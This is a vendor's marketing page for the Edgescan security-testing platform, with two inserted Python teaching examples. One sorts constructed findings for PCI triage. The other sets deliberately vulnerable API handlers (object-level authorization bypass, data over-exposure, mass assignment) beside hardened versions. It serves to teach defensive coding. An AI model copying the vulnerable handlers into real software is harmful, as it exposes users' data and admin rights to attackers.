Your ideal tool will vary according to your organization’s needs, but the Edgescan eXposure Factor (EXF) often proves particularly valuable to smaller organizations with internal security teams of commensurate size. Some may have a handful of employees, others just one, who are focused on information security. While these shops will typically have fewer web-facing applications and less expansive network architecture than their larger peers, they’re still likely to run into a threat matrix that’s challenging or even overwhelming. With lots of potential vulnerabilities to address and limited resources to do so, the EXF becomes a key tool in their remediation assignment process, offering a quick, simple, and dependable blueprint for a team scrambling into action. That said, the EXF is also a boon to large security teams managing the sprawling web-facing infrastructure of a major organization.
No matter how great the organization’s resources, the internal security team is unlikely to have all the personnel necessary to devote huge amounts of time to remediating any one vulnerability. The EXF becomes their blueprint, too, and when they can move quickly and decisively against major threats, the security team can produce concrete results on the record—a crucial element to operating within a large enterprise with many stakeholders. When you can point to 12 security gaps that you’ve closed over the last month, it goes a long way. That’s one of the many benefits of compiling all the real threats in your Edgescan dashboard, rated for their level of risk so you can fix the worst first and power on from there. That’s risk-rated remediation intelligence with Edgescan.

### PCI Approved

Firms that authorize online transactions have certain information-security obligations under the law. Edgescan will partner with your team to strengthen your security posture beyond full regulatory compliance, building a cutting-edge defense for your web-facing assets.

#### The Baseline

The Payment Card Industry Security Standards Council (PCI SSC) has established a number of requirements for firms that process financial transactions via web-facing applications. Organizations are obligated by law to establish a robust security posture in order to defend against cyber threats and safeguard customers’ personal information, including credit card details and cardholder data.

The longtime core requirement is 11.2.2: firms must undergo Quarterly Vulnerability Scanning by a PCI SSC Approved Scanning Vendor (ASV). If significant issues are identified, continual rescanning is necessary until no vulnerabilities rated 4.0 or higher by the CVSS are present.

#### Scan Compliance

Edgescan is recognized as a PCI SSC Approved Scanning Vendor (ASV), which designates a firm that conducts external vulnerability scanning services and validates a payment processor’s adherence to the scanning requirements of PCI DSS. The Edgescan solution has been fully approved for PCI ASV scanning across all geographies, and Edgescan is ISO27001-certified to handle your customers’ information with the utmost care.

#### Evolving Demands

The PCI SSC has updated the regulatory framework for firms processing payments online to keep pace with the evolving threat environment and advancements in information-security tools. From March 31, 2024, the requirements have grown to include:

- Annual Penetration Test: 11.4.2 and 11.4.3 mandate an Annual Penetration Test on both internal and external Cardholder Data Environments (CDEs), as well as additional pen tests following significant changes to infrastructure or applications.
- Verification of Remediation: 11.4.4 holds that organizations must achieve Verification of Remediation by conducting repeat testing to certify the effectiveness of corrective actions.
- Prioritization: The regulations also advocate for a Risk-Based Approach to prioritizing remediation efforts.

#### Continuous Compliance

Edgescan will probe your web-facing applications, network, and more to ensure your PCI compliance requirements are met and that you pass your quarterly scan, but many of our clients require the flexibility of conducting ASV scans themselves. Instead of once per quarter, they may choose to run them daily, weekly, or on a more ad-hoc basis.

The award-winning Edgescan dashboard allows clients to initiate scans on-demand, and the results are consolidated in a single interface to allow for a more efficient and holistic approach to maintaining PCI compliance.
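The two rules this page actually states are the ASV pass condition (no open vulnerability rated CVSS 4.0 or higher, rescan until none remain) and the risk-based ordering that the Risk Rating section builds from CVSS, EPSS and CISA KEV. The following is an added example, not Edgescan code, that applies both to a constructed set of findings; the Finding fields, the placeholder identifiers and the KEV-first, then EPSS, then CVSS ordering are assumptions for illustration and are not Edgescan's proprietary EXF or EVSS scoring.

```python
"""Added example (not Edgescan's code): PCI ASV pass/fail check plus a
KEV-first, EPSS-then-CVSS remediation queue over constructed findings.

Assumptions: the Finding fields, the placeholder identifiers and the sample
data are constructed for this example; the ordering rule is a plain
risk-based triage, not Edgescan's proprietary EXF or EVSS scoring.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Stated in the PCI section: the quarterly ASV scan fails while any
# vulnerability rated CVSS 4.0 or higher remains, so rescan until none do.
PCI_ASV_FAIL_THRESHOLD = 4.0


@dataclass(frozen=True)
class Finding:
    asset: str
    vuln_id: str   # placeholder identifiers below, not real CVE numbers
    cvss: float    # CVSS base score, 0.0 to 10.0
    epss: float    # EPSS probability (0.0 to 1.0) of exploitation in the next 30 days
    in_kev: bool   # listed in the CISA Known Exploited Vulnerabilities catalog


# Constructed sample data: one cardholder data environment with five validated findings.
SAMPLE_FINDINGS: List[Finding] = [
    Finding("web-01",  "EXAMPLE-0001", cvss=9.8, epss=0.92, in_kev=True),
    Finding("api-01",  "EXAMPLE-0002", cvss=7.5, epss=0.05, in_kev=False),
    Finding("host-02", "EXAMPLE-0003", cvss=3.1, epss=0.40, in_kev=False),
    Finding("web-01",  "EXAMPLE-0004", cvss=5.3, epss=0.01, in_kev=False),
    Finding("host-03", "EXAMPLE-0005", cvss=8.8, epss=0.30, in_kev=True),
]


def pci_asv_blockers(findings: Iterable[Finding]) -> List[Finding]:
    """Findings that by themselves fail the quarterly ASV scan (CVSS >= 4.0)."""
    return [f for f in findings if f.cvss >= PCI_ASV_FAIL_THRESHOLD]


def asv_scan_passes(findings: Iterable[Finding]) -> bool:
    """True only when no finding at or above the 4.0 threshold is still open."""
    return not pci_asv_blockers(findings)


def remediation_order(findings: Iterable[Finding]) -> List[Finding]:
    """Risk-based 'what do I fix first' queue.

    Known-exploited (KEV) findings come first because exploitation is already
    observed in the wild; within each group a higher EPSS (more likely to be
    exploited soon) wins, and CVSS breaks any remaining ties.
    """
    return sorted(findings, key=lambda f: (not f.in_kev, -f.epss, -f.cvss))


def after_remediation(findings: Iterable[Finding], fixed_ids: Iterable[str]) -> List[Finding]:
    """Simulate the rescan after the listed findings were fixed and retested."""
    fixed = set(fixed_ids)
    return [f for f in findings if f.vuln_id not in fixed]


def triage_report(findings: Iterable[Finding]) -> Dict[str, object]:
    """One view a security team can act on: ASV status plus the fix-first queue."""
    findings = list(findings)
    return {
        "asv_passes": asv_scan_passes(findings),
        "asv_blockers": [f.vuln_id for f in pci_asv_blockers(findings)],
        "fix_first": [f.vuln_id for f in remediation_order(findings)],
    }


if __name__ == "__main__":
    report = triage_report(SAMPLE_FINDINGS)
    print(report)
    # A second pass after the four blockers are fixed should now pass ASV.
    print(triage_report(after_remediation(SAMPLE_FINDINGS, report["asv_blockers"])))
```

Note that EXAMPLE-0003 sits below the ASV threshold yet ranks third in the fix-first queue on EPSS alone, which is exactly why compliance scanning and risk-rated prioritization are treated as separate questions on this page.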
Once the report on a system’s vulnerabilities is compiled, our expert penetration team is available to advise you on what course of action is required to pass your quarterly assessments.

The platform also incorporates a guided remediation process with a variety of risk-rating tools to assist your internal security team in prioritizing the most critical threats for immediate remediation, per PCI guidance. When a vulnerability is marked as resolved in the Edgescan dashboard, a team of CREST- and OSCP-certified experts is on hand to probe that asset and verify the remediation, thereby satisfying Requirement 11.4.4.

#### Seamless Service

The Edgescan solution is tailored to snap into and enhance your existing security model. With that in mind, it involves:

- No Agents or Software Installations: Edgescan ASV does not use agents or require you to install software to perform our scanning service.
- No Disruptions: When conducting a scan, Edgescan ASV does not interfere with the cardholder data system.
- Production-Safe Testing: Edgescan will deliver precautionary assessments of planned activities to help ensure we do not cause outages.
- Flexible Schedules: Edgescan offers automatic scheduling for required quarterly scans, or you can scan as often as you’d like to identify and remediate vulnerabilities on a rolling basis.
- 24/7 Support: Leverage round-the-clock chat, email, or telephone support to understand and address issues. Maintain your coverage across all web-facing assets, be it on-site or via public, private, or hybrid cloud infrastructure.
- Dev Support: Scan your web applications during and after development to ensure they’re securely built and securely maintained.

#### Beyond Compliance

Edgescan ASV reports do not just satisfy PCI-ASV standards, they clear the bar with plenty of room to spare. The Edgescan ASV solution is powered with the same logic as the award-winning Edgescan continuous security testing and exposure management SaaS platform, which is used by some of the world’s largest and best-known enterprises. Clients who operate a continuous compliance model use the full Edgescan service, as it has the added flexibility of running unlimited scans for the same fixed annual cost.

The regulatory framework surrounding online payment processing will continue to evolve, but regular penetration testing is now the industry standard for high-risk web-facing assets and those of critical organizational importance, as are risk prioritization tools that guide security teams through the remediation process. Verification of remediation is also essential for any internal security team seeking full confirmation that they’ve addressed a system vulnerability. The Edgescan platform provides all these elements of PCI compliance as a baseline, then offers another level of insight into your attack surface—from the network level to web-facing applications to APIs and more—to help you build a cutting-edge security framework that represents the industry standard of tomorrow.

### Full Stack

Many security teams rely on a growing number of partial, disparate, and siloed solutions to maintain their security posture, sometimes dozens at a time. But bad actors have a holistic view of any organization’s attack surface. Why shouldn’t your security team have the same? You can—with Edgescan.

#### Personalized Insights

Cybersecurity technology has developed in a piecemeal fashion.

As new types of web-facing assets grow in prominence and become integral to the operations of large organizations—applications, APIs, IoT devices—they also become targets for malign actors.
Attackers gradually expose vulnerabilities in each new component and the cybersecurity field continually responds, springing into action to develop new, specialized tools to manage each new region of the attack surface.

This is the arms race between bad actors and security professionals, and each defense technology matures over time through innovation and competition between different firms offering rival solutions to manage each area.

But in this model, the two competing tools both still focus on one layer of the stack, and the market for cybersecurity solutions has thus developed as a bunch of different markets for a bunch of different specialized products.

For most security leaders at large organizations, the question is still, “Which tool is best to protect this layer?” But too few security teams are asking, “How do I think holistically about my attack surface, just like an attacker does? And is there a solution that will accurately detect vulnerabilities that are critical threats to our organization, regardless of where they might occur across the full stack?”

#### Siloed Solutions

The main result of the point-solution paradigm is that many organizations have built up an unwieldy set of solutions, each dedicated to its own layer of the stack. In many cases, this array of different tools is unmanageable because of the sheer number of moving parts and the difficulty in getting them—and the security team members managing them—to talk to each other effectively.

“The reality of security today is that security leaders have too many tools,” Gartner’s Top Security and Risk Trends for 2021 found. Security leaders reported having an average of 16—yes, sixteen—or more tools in their portfolio. 12% said they had 46 or more!

These arrangements are far too complex and require excessive human resources to manage, which is why 80% of organizations are interested in a vendor-consolidation strategy.
Large security vendors are responding with more integrated products, but these projects are still developing and in some cases are operating on a timeline of years.

If you’re going to transform your security approach into a consolidated, full-stack strategy—and present this plan of action to other stakeholders within your organization—it needs to be a question of months, not years.

#### Wait—What is the Full Stack?

It’s a common term in IT and software-development circles—a “full-stack developer” is often in high demand—but what does this term signify in the context of vulnerability management? The stack has five distinct layers:

1. Web Application Layer: including APIs, website, and mobile
2. Hosting Environment: web application server
3. Host Operating System: underlying host infrastructure
4. Host Machine Services: network protocols, services, and ports
5. Underlying Network: associated devices including IoT, firewalls, and routers

#### The Superior Approach

The good news is that there’s already a comprehensive solution on the market, and it will streamline your operations, lower your risk, build efficiency, and save you money.

Edgescan’s continuous security testing and exposure management SaaS platform delivers:

- The Full Picture: Get a comprehensive view of your attack surface across all your web-facing assets, from applications to APIs to the host network and more. Map all your vulnerabilities and assess them, regardless of where they might be lurking in your network infrastructure.
- Validation: With a hybrid verification approach, automated assessments are backed by human expertise from dedicated penetration testers, so you can have full confidence that all the threats identified across every layer of your stack are real, free of false positives, and all in one place: the Edgescan dashboard.
- Streamlined Operations: With point solutions targeting different layers, there will at times be multiple tickets with multiple vendors targeting one vulnerability. With a single solution, you get one alert in a single point of contact—the Edgescan dashboard—for a singular view.
- Unified Strategy: With a single platform featuring risk-rated results, the security team can pinpoint the most critical threats across the whole stack for prioritized remediation and develop a holistic strategy for continuous risk management.
- Compliance: Whatever your specific regulatory framework, it is likely to feature requirements that span across the whole stack. It’s about managing risk, regardless of where threats emerge. Why not use a single solution to ensure continuous compliance?
- Cost: The overhead expenses with a siloed-layer approach have many layers themselves: setup costs, training to build your staff’s skills to operate specialized tools, maintenance on multiple software sets, costs to build integration and communication between point solutions. Even if yours is a large organization that can afford to “manhandle” the integration problem to piece together a full-stack view of your risk—an option not available to small and midsize companies—why not put your money into setup, training, and maintenance on a singular, comprehensive solution?

#### Think Like an Invader

It has become the norm for many organizations’ internal security teams to address each layer of the stack separately, shopping out specialized, point-scanning tools and building up staffing expertise to run each of these tools. This is known as a “best-of-breed” approach, but while the focus on each individual layer might be the norm, it has actually created a systemic problem.

Think about your attack surface like an attacker would. Bad actors are constantly scouring your entire stack, hunting for a security gap or awaiting a lapse in judgment. The attacker is not fixated on one layer or another of your stack, be it an application or an API or your core network. They don’t care about the individual layers; they have a composite view and simply want the easiest path with the least effort offering the highest chance to secure their goal. They scour the entire attack surface for the most critical vulnerabilities, anywhere there’s a window to wedge open. Once they’re inside, they seek to escalate privileges and maximize their penetration—and the havoc they can wreak—throughout your systems.

The typical enterprise cybersecurity department has gone down the path of a siloed, individual-layer approach. That’s become the industry standard by default based on how technologies have been developed and how markets have grown up around them. But there’s no need to make the best of—or even double down on—a flawed approach by devoting more time and resources to those individual tools and building a system to share data and information between them.

Effective consolidation of disparate platforms could take years to implement, but there’s a comprehensive, full-stack solution available to leave this paradigm behind. We don’t have to allow history to define us, particularly when we know one thing for sure: your attacker is hoping you do not go Full Stack.

### AI Insights

Utilize Edgescan AI Insights to analyze vulnerability data in real time.

In today’s rapidly evolving digital landscape, organizations face an array of growing and diversified cyber threats. Their security teams face difficult questions:

“What vulnerabilities should we focus on?”

“What type of training for our developers would help improve our security posture?”

“Which assets are potentially exposed to ransomware attack?”

The answers are more complex than ever — and more specific to each individual organization.
Traditional methods often fall short in providing timely and actionable advice, but AI Insights by Edgescan leverages cutting-edge machine-learning technology to empower an organization’s information-security team to make informed decisions in real time and strengthen their security posture on a continuous basis.

By analyzing vulnerability data with Amazon Bedrock and a tuned version of Anthropic’s Claude, Edgescan delivers personalized, tactical recommendations for mitigating risk, prioritizing remediation efforts, and maintaining compliance.

#### Personalized Insights

The engine delivers strategic analysis tailored to your organization’s specific vulnerability data and systems architecture while incorporating Edgescan’s deep knowledge of the prevailing cyber threat environment.

#### Dynamic and Scalable

The solution analyzes a vast data lake of over 15,000,000 verified vulnerabilities to generate actionable insights, and can adapt to your organization’s needs to provide intelligence that’s specific to one unit of your business or applicable across multiple.

These insights will continuously update as your business grows and your security posture evolves, and reports are directly linked to live vulnerabilities within your systems so you can take prompt action with full context.

#### Threat-Based Prioritization

Address the most critical issues first with insights that draw on real-world threat analysis, ransomware intelligence, and a vast reservoir of metadata.

#### Ransomware Risk Assessment

The Edgescan engine evaluates vulnerabilities when they’re uncovered to specifically assess the risk that they could be exploited by ransomware.

#### Compliance Guidance

This cutting-edge intelligence provides guidance as you move into full compliance with regulatory frameworks such as CIS, PCI-DSS, DORA, HIPAA, ISO, SOC2, GDPR, and more.

#### Training Focus

Get sharp insight into where you can best allocate resources for developer education and technical training based on trends in the vulnerability landscape, the current and future rate at which a specific vulnerability might occur, and the associated risk profile of that vulnerability with respect to your organization.

With this informed view of the landscape, you can guide your investments in training and education to reduce vulnerability recurrence, improve overall security expertise, and maximize value for your dollar.

#### Exploitable Vulnerabilities

What are your current open vulnerabilities, and what are the associated exploit codes to look out for as you go about prioritization and remediation? AI Insights by Edgescan has the answers.

#### Anomaly Detection

Identify unusual patterns in your data with AI Insights, including vulnerability clustering, frequent exposure types, and trends across your entire cyber estate or one particular business unit.

#### Your Data is Safe with AI Insights

Edgescan does not pass any identifiable data to our AI. This approach is designed to ensure privacy and data security, a common issue with AI services. AI Insights can also be disabled if this kind of service is “not your thing.”

### Features

The Edgescan Platform Features

False-positive Free! The continuous security testing and exposure management SaaS platform that eliminates the need for tool configuration, deployment, or management. By providing vulnerability intelligence and remediation information along with human guidance and vulnerability verification, we help our customers prevent security breaches, safeguarding their data and IT assets.

#### AI Insights

In today’s rapidly evolving digital landscape, organizations face an array of growing and diversified vulnerabilities and a growing number of complex questions when it comes to identifying them and prioritizing them for remediation. How do they fit in the global threat matrix? What are the associated exploit codes? AI Insights by Edgescan has these answers and more.
#### Full Stack

Many security teams rely on a growing number of partial, disparate, and siloed solutions to maintain their security posture, sometimes dozens at a time. But attackers don’t care which layer of your attack surface they access—they’re just looking for vulnerabilities to exploit. To think like an attacker and maximize your systems’ resilience, choose Edgescan’s comprehensive solution and streamline your operations, lower your risk, build efficiency, and save money.

#### Integrations

Businesses today depend on a range of different solutions to coordinate their workflow, communication, asset management, webhooks, and more. Edgescan’s continuous security testing and exposure management SaaS platform integrates into your operational ecosystem, working with leading technology solutions such as AWS, Google Cloud, and Microsoft Azure through an API-first approach that strengthens your overall security posture.

#### PCI Approved

The Payment Card Industry Security Standards Council (PCI SSC) has established a number of requirements for firms that process financial transactions via web-facing applications, including quarterly vulnerability scanning by a PCI SSC Approved Scanning Vendor (ASV) and an annual penetration test. The Edgescan platform is PCI-approved and ready to bring your enterprise into full compliance with all applicable regulations.

#### Risk Rating

Secure what matters, starting with what matters most. With Edgescan’s hybrid validation approach, you’ll always get a list of vulnerabilities across your full stack that is virtually free of false positives. But what should you fix first? The answer delivers value back to your business in the form of time and money, all while strengthening your security posture. Edgescan consistently delivers those answers to organizations large and small with data-powered tool sets backed by the human element: on-demand support from CREST- and OSCP-certified experts. This is prioritized threat intelligence with a human touch.

#### Expert Support

When you enlist Edgescan’s continuous security testing and exposure management SaaS platform, you gain a team of CREST- and OSCP-certified experts who partner with your internal security professionals to strengthen your security posture. Our seasoned penetration testers are on call throughout every stage of the process, from activation to validation to remediation and beyond.

### Attack Surface Management

Attack Surface Management (ASM): complete visibility, unified view.

Edgescan ASM provides immediate asset discovery and visibility of an enterprise’s internet-facing estate, then continuously monitors the attack surface as it evolves and changes.

#### Visibility is Key to Breach Prevention

In today’s multi-cloud world, enterprises require an external attack surface management solution that effectively inventories, monitors and manages their corporate assets and digital footprint. An ad-hoc approach simply no longer works for managing external attack surfaces. Manual processes and legacy tools make managing your attack surface complex and expensive, and results are flooded with false positives and human errors. The more an organization grows, the larger the attack surface becomes, increasing your risk exposure.

#### Visibility of the Entire Ecosystem

Edgescan’s external Attack Surface Management (ASM) is our most advanced solution yet, designed to detect threats across external services and bring unknowns into the platform for investigation by the security team. It solves the lack of visibility and remediation velocity that occurs with legacy tools and manual processes, making it the cornerstone of any modern continuous threat exposure management (CTEM) program.
#### Leverage cyber analytics and human expertise

Edgescan ASM uncovers attack vectors (ransomware and phishing are two examples) that can be used to breach your most critical assets, including data exposures and misconfigurations. The platform uses both vulnerability data and business context to prioritize risk.

According to Gartner®: “By 2026, organizations prioritizing their security investments, based on a continuous threat exposure management program, will realize a two-thirds reduction in breaches.”

#### Benefits of using Attack Surface Management

- Complete visibility: the platform intelligently probes and identifies all networking devices, internet-facing devices, platforms, operating systems, databases, and web applications. It finds unknown assets across the entire internet, identifies security blind spots from discovered assets, discovers APIs, enumerates shadow IT, and automates the analysis of changes across the entire IT ecosystem.
- Map and inventory DNS/internet records: discover existing records related to your deployed systems, servers, websites, APIs and applications. Find and inventory related subdomains or obfuscated records that may direct an attacker to your internet footprint.
- Unlimited and on-demand investigations: run proactive and continuous investigations at the pace your organization requires. The platform also provides complete flexibility to modify deployment models whenever needed.
- Get alerts for discoveries and exposures: set up custom alerts and get notified of discoveries, then track and inventory exposures. Receive notifications when new systems are deployed, decommissioned or changed.

Edgescan Attack Surface Management (ASM) is a software as a service, sold as an annual subscription.
#### See How We Do Risk Management

Edgescan Attack Surface Management’s core purpose is to discover unknown domains, subdomains, related domains, and APIs, identifying security weaknesses such as misconfigurations, software vulnerabilities, exposed credentials and shadow IT that can be exploited by malign actors.

### API Security Testing

Discovery + Automation + Humans + AI = Unparalleled CTEM

API discovery and testing gives vital protection for this increasingly critical component of the modern application.

#### API Risk is Increasing, Not Going Away

Actual deployment data from Edgescan customers reveals a 320% rise in API vulnerabilities in 2022 – a shocking number. On top of that, Gartner research indicates that API abuse will become the most frequent attack vector in the years to come. Don’t let your company become a news headline; it is time to get your security under control.

#### Know Your APIs, Scan Your APIs

Don’t confuse API security configuration assessment with traditional vulnerability scanning: it is different. Using multi-layer probing technology, the Edgescan API discovery engine uses asynchronous port scanning to identify and then monitor network changes. It automatically discovers active API endpoints across your entire attack surface and builds profiles from the endpoints it finds.

#### Complete cloud coverage

Discover hidden and rogue APIs across your cloud providers, including AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI. Our multi-layered approach to discovering APIs results in a confidence interval describing whether an API is actually present. API discovery works by applying specialised probing traffic to each endpoint and evaluating the results; APIs are detected based on the responses to the probes sent.

#### Securing APIs is as easy as one, two, three...
Upgrade your API security posture to proactive with the Edgescan API security solution: Discover – Automate – Penetration Test.

1. Discover: identify known and rogue APIs on each host across your IP/CIDR ranges using patented, multi-layer, production-safe API probing technology.
2. Automate: detect security vulnerabilities with accuracy to keep pace with your ever-changing IT landscape.
3. Pen Test: a manual penetration test is conducted on every business-critical API.

#### 90% of web application attacks target APIs

According to the 2024 Data Breach Investigations Report (DBIR) by Verizon, 90% of web application attacks target APIs, demonstrating their critical role in application security.

#### Benefits of API Security Testing

- API discovery across your global ecosystem: identify known and rogue APIs on each host across your IP/CIDR ranges using patented, multi-layer, production-safe API probing technology.
- Accurately monitor and track changes: map out entire APIs to ensure a rigorous assessment and detect changes by consuming OpenAPI/Swagger/GraphQL files.
- Proactive and continuous API protection: establish monitoring and defense against botnets, advanced threats, and DDoS with on-demand and real-time alerts.
- Complete cloud coverage: discover hidden and rogue APIs across your cloud providers, including AWS, Microsoft Azure, GCP, VMware NSX, and Cisco ACI.

Edgescan API Security Testing is a software as a service, sold as an annual subscription.

#### High-risk API vulnerabilities discovered by Edgescan

Broken object-level authorization. APIs often expose endpoints that handle object identifiers. Any function that accepts user input and uses it to access a data source can create an object-level access control issue, widening the attack surface. Object-level authorization checks should be carried out on all such functions.
Broken user authentication. Attackers often take advantage of incorrectly applied authentication mechanisms. They may compromise an authentication token or exploit flaws in the implementation to pose as another user, either on a one-time basis or permanently. If the system’s ability to identify the client/user is compromised, so is the overall security of the API.

Excessive data exposure. Developers often rely on the client side to filter data before displaying it to the user. This can create serious security issues: data must always be filtered on the server side, and only the relevant information should be delivered to the client.

Lack of resources and rate limiting. APIs often don’t restrict the number or size of resources that the client/user can request. This can affect the performance of the API server, resulting in Denial of Service (DoS), and can expose authentication endpoints to brute-force attacks.

Broken function-level authorization. Authorization flaws often result from overly complex access control policies, or from no clear separation between regular and administrative functions. Attackers can exploit these vulnerabilities to gain access to other users’ resources or perform administrative functions.

Mass assignment. Mass assignment typically results from binding client-provided data (e.g. JSON) to a data model without filtering its properties against an allowlist. Attackers can modify object properties in a number of ways: they can explore API endpoints, read the documentation, guess object properties, or provide additional properties in request payloads.

Security misconfiguration. Security misconfiguration often results from inadequate default configurations, ad-hoc or incomplete configurations, misconfigured HTTP headers or inappropriate HTTP methods, insufficiently restrictive Cross-Origin Resource Sharing (CORS), open cloud storage, or error messages that contain sensitive information.
Injection. Injection flaws (including SQL injection, NoSQL injection, and command injection) involve data sent to an interpreter from an untrusted source as part of a command or query. Attackers can send malicious data to trick the interpreter into executing unintended commands or into returning data without the necessary authorization.

### Mobile

Mobile Application Security Testing (MAST): Vulnerability Assessment + Penetration Testing + Device Forensics

Comprehensive mobile application security testing that addresses the unique threats that mobile apps often present.

#### Built for Mobile Apps

As organizations increasingly provide mobile applications to enable their remote workforce and boost productivity, their security teams must ensure the safety and integrity of these mobile devices, apps and data. With the rapid and expanding use of mobile apps in the workforce comes an extended attack surface for cybercriminals.

#### Complete Coverage for iOS & Android

Mobile risk assessments discover and examine all assets within your mobile devices and applications to expose vulnerabilities and threats that may jeopardize data security or performance. MAST includes a device forensics component that is unique to the mobile attack surface. It is designed to detect leakage of data onto a device, including jailbroken devices and their associated risks.

#### Make mobile apps safe

The mobile application threat landscape is increasingly complex and dynamic, posing substantial risks to both individuals and organizations. As enterprise mobile app usage increases, it is essential to implement a robust security testing program and stay informed about evolving threats to safeguard sensitive information. Ensure your applications and devices remain secure: our continuous security testing and device forensics solution gives you complete coverage across your mobile application ecosystem.
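The broken object-level authorization, excessive data exposure and mass assignment entries in the API Security Testing list above are easiest to understand side by side in code: each has a handler that trusts the client and a handler that enforces the check on the server. The following is an added illustration, not Edgescan code; the in-memory order and profile records, the user names and the field allowlists are all constructed for the example.

```python
"""Vulnerable vs. hardened API handlers for three of the weaknesses listed
above: broken object-level authorization (BOLA), excessive data exposure and
mass assignment.  Added example, not Edgescan code; the in-memory 'database',
user names and field names below are constructed for illustration."""
from dataclasses import dataclass


class Forbidden(Exception):
    """Raised when the caller may not access the requested object."""


@dataclass
class Order:
    order_id: int
    owner: str
    total: float
    internal_margin: float   # server-only field; must never reach a client
    shipping_address: str


# Constructed sample data: two customers, one order each.
ORDERS = {
    1: Order(1, "alice", 120.0, 0.35, "1 Main St"),
    2: Order(2, "bob", 80.0, 0.10, "2 High St"),
}

# --- Broken object-level authorization + excessive data exposure ----------

def get_order_vulnerable(current_user: str, order_id: int) -> dict:
    """Trusts the client-supplied id and serialises the whole model.
    Any authenticated user can read any order (BOLA), and the response
    carries server-only fields (excessive data exposure)."""
    order = ORDERS[order_id]
    return vars(order).copy()


# Explicit allowlist of the fields a client is entitled to see.
ORDER_PUBLIC_FIELDS = ("order_id", "total", "shipping_address")


def get_order_hardened(current_user: str, order_id: int) -> dict:
    """Checks ownership on the server and serialises only allowlisted fields."""
    order = ORDERS.get(order_id)
    # One error for both 'missing' and 'not yours', so the response does not
    # reveal which ids exist.
    if order is None or order.owner != current_user:
        raise Forbidden(f"order {order_id} not accessible to {current_user}")
    return {name: getattr(order, name) for name in ORDER_PUBLIC_FIELDS}

# --- Mass assignment ------------------------------------------------------

@dataclass
class Profile:
    username: str
    display_name: str
    email: str
    is_admin: bool = False   # privileged flag; never client-writable


def update_profile_vulnerable(profile: Profile, payload: dict) -> Profile:
    """Binds every JSON key straight onto the model, so a payload that
    contains 'is_admin' changes the privilege flag."""
    for key, value in payload.items():
        setattr(profile, key, value)
    return profile


PROFILE_WRITABLE = ("display_name", "email")


def update_profile_hardened(profile: Profile, payload: dict) -> Profile:
    """Copies only allowlisted properties.  Unknown keys are rejected rather
    than silently dropped, so attempts to write other fields are visible."""
    unknown = set(payload) - set(PROFILE_WRITABLE)
    if unknown:
        raise ValueError(f"unexpected properties: {sorted(unknown)}")
    for key in PROFILE_WRITABLE:
        if key in payload:
            setattr(profile, key, payload[key])
    return profile


def demo() -> dict:
    """Run both variants against the same constructed requests."""
    leaked = get_order_vulnerable("alice", 2)      # alice reads bob's order
    try:
        get_order_hardened("alice", 2)
        blocked = False
    except Forbidden:
        blocked = True
    payload = {"display_name": "B", "is_admin": True}
    tampered = update_profile_vulnerable(Profile("bob", "Bob", "b@example.com"), payload)
    try:
        update_profile_hardened(Profile("bob", "Bob", "b@example.com"), payload)
        rejected = False
    except ValueError:
        rejected = True
    return {"leaked_margin": leaked["internal_margin"], "bola_blocked": blocked,
            "admin_via_mass_assignment": tampered.is_admin,
            "mass_assignment_rejected": rejected}


if __name__ == "__main__":
    print(demo())
```

The hardened handlers share one design rule: the server decides both which object a caller may read and which properties may be read or written, using an explicit allowlist rather than the client's payload or the model's full field list.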
#### A single-pane-of-glass view

Edgescan Mobile extends its vulnerability assessment and penetration-testing capabilities into mobile environments, providing complete testing coverage for iOS and Android. Our hybrid approach pairs automated vulnerability intelligence with validation and human expertise: we test all relevant mobile components and present the results in the Edgescan platform in an intuitive ‘single-pane-of-glass’ view.

1. Edgescan starts by ingesting the API components used by the mobile devices and applications into its platform.
2. Our vulnerability scanning engine then builds a precise profile of each application and runs an assessment of it and of the host/server layer.
3. After the initial scan is completed, a manual penetration test is performed against the API/app, to test for business logic vulnerabilities and vulnerabilities that legacy scanners cannot find.
4. Edgescan then downloads a build of the native mobile application onto our test devices and begins deep testing and device forensics.
5. All results are delivered to the Edgescan platform, which allows for unlimited retesting and reporting, while ensuring data is safely stored, transmitted, and secured in your mobile environment.

#### Mobile apps have at least one critical vulnerability

In a 2023 study by Check Point Research, approximately 75% of mobile applications had at least one critical vulnerability.

#### Benefits of using Mobile Application Testing

- Full-stack security: API vulnerability assessment, pentesting, and mobile forensic analysis combined in one unified platform, simplifying daily operations.
- Prioritized, actionable results: only real, prioritized and actionable results are delivered, eliminating the false-positive "noise" to reduce costs and save time.
- Customizable reporting: risk-rated results with prioritized remediation. Edgescan employs several risk scoring systems (e.g., CVSS, CISA KEV, EPSS) and our own Validated Security Score to risk-rate results.
- Certified experts: access to CREST-certified security analysts who will test and expedite the effective implementation of your cloud, network and mobile security strategy.
- Meet compliance: Edgescan is a certified PCI-ASV and delivers testing covering the OWASP Top 10, the WASC Threat Classification, and the CWE/SANS Top 25.

Edgescan Mobile Application Security Testing (MAST) is a software as a service, sold as an annual subscription.

### Dynamic Application Security Testing

Dynamic Application Security Testing (DAST): validated results, enterprise scale, AI advisory.

The human layer of our service ensures accurate vulnerability risk, minimizes false positives, and delivers prioritized fixes with proven exploits.

#### Continuous Security Testing

Today’s enterprises deploy a wide range of Layer 7 services, with APIs and microservices beginning to replace many web applications across the enterprise space. These applications are under a regime of frequent change, and security testing of such systems is of vital importance. The Edgescan DAST solution provides full-stack coverage of your entire application attack surface, with validated and proven vulnerabilities delivered to you as often as you need. We align your scanning frequency to your remediation program to ensure effective and efficient use of the most accurate DAST solution on the market.

#### Industrial-Scale Coverage

From one application to 10,000, every web application assessed gets the “full-stack” treatment, meaning the application undergoes penetration testing and automated vulnerability assessment. Each exposure that is discovered is assessed for severity and for whether it is listed as a vulnerability currently being exploited on the public Internet. It is validated to determine whether it is exploitable and a real risk.
This makes prioritization much easier. Each vulnerability is verified by our team of certified experts to ensure that only REAL threats are escalated. Edgescan customers never experience false positives or false alarms.

#### Validated vulnerability scanning on demand and on a schedule, as often as you need it

Our hybrid process of advanced scanning automation and cyber analytics combined with human intelligence is what differentiates us from scanning tools and traditional pen testing services.

#### Integrations

Complete visibility to expose weaknesses and risk across your deployed applications and web services. Edgescan relays verified vulnerability data into your existing CI/CD toolset, so DevOps teams have the critical data they need earlier in the software development lifecycle.

#### Organizations spend 25% of their time managing security alerts

A study by the Ponemon Institute found that organizations spend an average of 20,000 hours annually dealing with false positives, leading to a significant reduction in productivity. This time expenditure equates to about 25% of the total time spent managing security alerts.

#### Benefits of Dynamic Application Security Testing

- Hybrid approach to assessments: applications are assessed using the platform’s automated tools combined with human expertise and cyber analytics, resulting in high accuracy and industrial-scale coverage and eliminating false positives.
